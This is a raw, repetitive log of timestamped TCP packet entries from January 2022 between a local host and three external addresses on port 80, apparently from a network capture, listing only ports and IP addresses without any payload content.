Jan 9, 2022 18:48:51.413140059 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413156986 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.413177013 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413216114 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413228989 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.413254023 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413290024 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413305044 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.413328886 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413366079 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413378954 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.413403988 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413443089 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413458109 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.413479090 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413516045 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413532019 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.413553953 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413589954 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413606882 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.413628101 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413666010 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413681030 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.413703918 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413743019 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413770914 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.413794041 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413831949 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413846970 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.413871050 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413907051 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413921118 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.413945913 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413984060 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.413996935 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.414020061 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.414052963 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.414064884 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.414103031 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.423279047 CET	49865	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:51.553076029 CET	80	49866	211.119.84.112	192.168.2.3
Jan 9, 2022 18:48:51.553117990 CET	80	49866	211.119.84.112	192.168.2.3
Jan 9, 2022 18:48:51.553178072 CET	49866	80	192.168.2.3	211.119.84.112
Jan 9, 2022 18:48:51.553227901 CET	49866	80	192.168.2.3	211.119.84.112
Jan 9, 2022 18:48:51.592133999 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:51.604266882 CET	80	49865	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:51.754889011 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:51.755000114 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:51.755096912 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:51.755116940 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:51.791210890 CET	80	49866	211.119.84.112	192.168.2.3
Jan 9, 2022 18:48:51.919209003 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.342957020 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.343014002 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.343053102 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.343092918 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.343103886 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.343154907 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.379511118 CET	49869	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:52.505961895 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.506016970 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.506057978 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.506095886 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.506747007 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.506788969 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.506827116 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.506846905 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.506864071 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.506876945 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.506903887 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.506948948 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.555285931 CET	80	49869	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:52.555427074 CET	49869	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:52.557595015 CET	49869	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:52.558903933 CET	49869	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:52.666949987 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.667004108 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.667047024 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.667084932 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.667135000 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.667169094 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.667753935 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.667795897 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.667833090 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.667845011 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.667872906 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.668278933 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.668751001 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.668791056 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.668826103 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.668837070 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.668910980 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.668951988 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.668998957 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.669764996 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.669806957 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.669845104 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.669858932 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.669922113 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.733297110 CET	80	49869	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:52.734411955 CET	80	49869	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:52.829974890 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.830027103 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.830066919 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.830106020 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.830116987 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.830167055 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.830934048 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.830984116 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.831018925 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.831054926 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.831073999 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.831100941 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.832834959 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.833815098 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.833858013 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.833872080 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.833898067 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.833949089 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.836842060 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.836905956 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.836942911 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.836978912 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.836981058 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.837021112 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.837028027 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.837821007 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.837863922 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.837888002 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.837903976 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.837940931 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.837980986 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.837989092 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.838035107 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.838804007 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.838844061 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.838880062 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.838898897 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.838917017 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.838956118 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.839003086 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.839804888 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.839844942 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.839873075 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.839883089 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.839921951 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.839958906 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.839966059 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.843117952 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.995013952 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.995074987 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.995115042 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.995182991 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.995814085 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.995852947 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.995872974 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.995893002 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.995932102 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.995970011 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.995981932 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.996015072 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.996759892 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.996800900 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.996839046 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.996896029 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.996901989 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.996943951 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.996992111 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.997812033 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.997853041 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.997869015 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.997890949 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.997930050 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.997941017 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.997967958 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.998014927 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.998800039 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.998838902 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.998877048 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.998892069 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.998914957 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.998959064 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.999783039 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.999824047 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.999861002 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.999876022 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:52.999900103 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.999943018 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:52.999990940 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.000758886 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.000797033 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.000833988 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.000859976 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.000870943 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.000894070 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.000931025 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.000977039 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.001774073 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.001812935 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.001863956 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.001899958 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.001940012 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.001976013 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.001987934 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.002804041 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.002841949 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.002876043 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.002878904 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.002921104 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.002933979 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.002958059 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.003110886 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.003809929 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.003846884 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.003885031 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.003923893 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.003938913 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.003959894 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.004781961 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.004821062 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.006544113 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.112940073 CET	80	49869	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:53.113056898 CET	49869	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:53.113235950 CET	49869	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:53.149986029 CET	49871	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:53.157890081 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.158767939 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.158804893 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.158843994 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.158845901 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.158884048 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.158922911 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.158936024 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.158966064 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.159759045 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.159817934 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.159885883 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.159904003 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.159945011 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.159984112 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.160029888 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.160783052 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.160824060 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.160846949 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.164808989 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.164864063 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.164868116 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.165791988 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.165828943 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.165851116 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.165868044 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.165908098 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.165916920 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.165947914 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.165997982 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.166768074 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.166807890 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.166847944 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.166867018 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.166886091 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.166932106 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.167756081 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.167797089 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.167833090 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.167849064 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.167872906 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.167912006 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.167920113 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.168762922 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.168802023 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.168812990 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.168839931 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.168890953 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.168905020 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.169120073 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.169173002 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.169800043 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.169837952 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.169874907 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.169913054 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.169928074 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.169951916 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.169975996 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.171787024 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.171825886 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.171844006 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.171864986 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.171901941 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.171938896 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.171952963 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.171982050 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.174081087 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.174118996 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.174156904 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.174192905 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.174218893 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.174232006 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.174243927 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.255110025 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.288880110 CET	80	49869	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:53.321882963 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.321929932 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.321968079 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.322002888 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.322006941 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.322038889 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.322067976 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.322753906 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.322792053 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.322824955 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.322856903 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.322860956 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.322890043 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.323805094 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.323842049 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.323878050 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.323892117 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.323904991 CET	80	49871	47.251.44.201	192.168.2.3
Jan 9, 2022 18:48:53.323920965 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.323987961 CET	49871	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:53.324094057 CET	49871	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:53.324480057 CET	49871	80	192.168.2.3	47.251.44.201
Jan 9, 2022 18:48:53.327828884 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.328752041 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.328788042 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.328818083 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.328819990 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.328865051 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.328881979 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.328918934 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.328959942 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.329791069 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.329830885 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.329865932 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.329904079 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.329921961 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.329943895 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.330012083 CET	49867	80	192.168.2.3	148.0.74.229
Jan 9, 2022 18:48:53.330858946 CET	80	49867	148.0.74.229	192.168.2.3
Jan 9, 2022 18:48:53.330898046 CET	80	49867	148.0.74.229	192.168.2.3
